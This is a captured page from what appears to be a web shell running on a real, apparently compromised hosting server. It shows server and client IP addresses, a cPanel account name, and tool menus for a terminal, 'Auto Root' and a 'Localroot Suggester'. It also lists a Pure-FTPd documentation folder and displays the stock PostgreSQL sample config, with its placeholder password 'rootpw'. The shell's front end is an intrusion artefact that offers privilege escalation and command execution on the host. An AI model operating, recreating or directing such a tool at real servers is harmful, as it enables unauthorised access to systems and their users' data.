Linux server1.hosting4iran.com 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
LiteSpeed
Server IP : 185.208.174.156 & Your IP : 216.73.216.218
Domains : 282 Domain
User : satitravel
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
cpanel-pure-ftpd /
Delete
Unzip
Name
Size
Permission
Date
Action
AUTHORS
7.26
KB
-rw-r--r--
2018-01-04 12:13
FAQ
31.79
KB
-rw-r--r--
2021-05-30 09:00
HISTORY
2.19
KB
-rw-r--r--
2021-12-16 12:08
NEWS
24
B
-rw-r--r--
2019-03-25 15:48
README
73.78
KB
-rw-r--r--
2024-09-18 15:34
README.Authentication-Modules
4.65
KB
-rw-r--r--
2019-03-25 17:10
README.Configuration-File
1.1
KB
-rw-r--r--
2021-12-16 12:09
README.LDAP
9.94
KB
-rw-r--r--
2019-04-20 09:36
README.MySQL
8.74
KB
-rw-r--r--
2020-03-31 16:22
README.PGSQL
8.1
KB
-rw-r--r--
2019-04-20 09:36
README.TLS
10.75
KB
-rw-r--r--
2019-04-20 09:36
README.Virtual-Users
11.68
KB
-rw-r--r--
2021-12-16 12:09
README.Windows
2.61
KB
-rw-r--r--
2018-01-04 12:13
THANKS
13.68
KB
-rw-r--r--
2018-02-26 00:19
pureftpd-ldap.conf
1.96
KB
-rw-r--r--
2018-01-04 12:13
pureftpd-mysql.conf
3.28
KB
-rw-r--r--
2019-04-20 09:36
pureftpd-pgsql.conf
2.89
KB
-rw-r--r--
2019-04-20 09:36
pureftpd.schema
2.49
KB
-rw-r--r--
2011-09-07 05:02
Save
Rename
################################################### # # # Sample Pure-FTPd PostgreSQL configuration file. # # See README.PGSQL for explanations. # # # ################################################### # If PostgreSQL listens to a TCP socket PGSQLServer localhost PGSQLPort 5432 # *or* if PostgreSQL can only be reached through a local Unix socket # PGSQLServer /tmp # PGSQLPort .s.PGSQL.5432 # Mandatory : user to bind the server as. PGSQLUser postgres # Mandatory : user password. You *must* have a password. PGSQLPassword rootpw # Mandatory : database to open. PGSQLDatabase pureftpd # Mandatory : how passwords are stored # Valid values are : "cleartext", "argon2", "scrypt", "crypt", and "any" PGSQLCrypt argon2 # In the following directives, parts of the strings are replaced at # run-time before performing queries : # # \L is replaced by the login of the user trying to authenticate. # \I is replaced by the IP address the user connected to. # \P is replaced by the port number the user connected to. # \R is replaced by the IP address the user connected from. # \D is replaced by the remote IP address, as a long decimal number. # # Very complex queries can be performed using these substitution strings, # especially for virtual hosting. # Query to execute in order to fetch the password PGSQLGetPW SELECT "Password" FROM users WHERE "User"='\L' # Query to execute in order to fetch the system user name or uid PGSQLGetUID SELECT "Uid" FROM users WHERE "User"='\L' # Optional : default UID - if set this overrides PGSQLGetUID #PGSQLDefaultUID 1000 # Query to execute in order to fetch the system user group or gid PGSQLGetGID SELECT "Gid" FROM users WHERE "User"='\L' # Optional : default GID - if set this overrides PGSQLGetGID #PGSQLDefaultGID 1000 # Query to execute in order to fetch the home directory PGSQLGetDir SELECT "Dir" FROM users WHERE "User"='\L' # Optional : query to get the maximal number of files # Pure-FTPd must have been compiled with virtual quotas support. # PGSQLGetQTAFS SELECT "QuotaFiles" FROM users WHERE "User"='\L' # Optional : query to get the maximal disk usage (virtual quotas) # The number should be in Megabytes. # Pure-FTPd must have been compiled with virtual quotas support. # PGSQLGetQTASZ SELECT "QuotaSize" FROM users WHERE "User"='\L' # Optional : ratios. The server has to be compiled with ratio support. # PGSQLGetRatioUL SELECT "ULRatio" FROM users WHERE "User"='\L' # PGSQLGetRatioDL SELECT "DLRatio" FROM users WHERE "User"='\L' # Optional : bandwidth throttling. # The server has to be compiled with throttling support. # Values are in KB/s . # PGSQLGetBandwidthUL SELECT "ULBandwidth" FROM users WHERE "User"='\L' # PGSQLGetBandwidthDL SELECT "DLBandwidth" FROM users WHERE "User"='\L'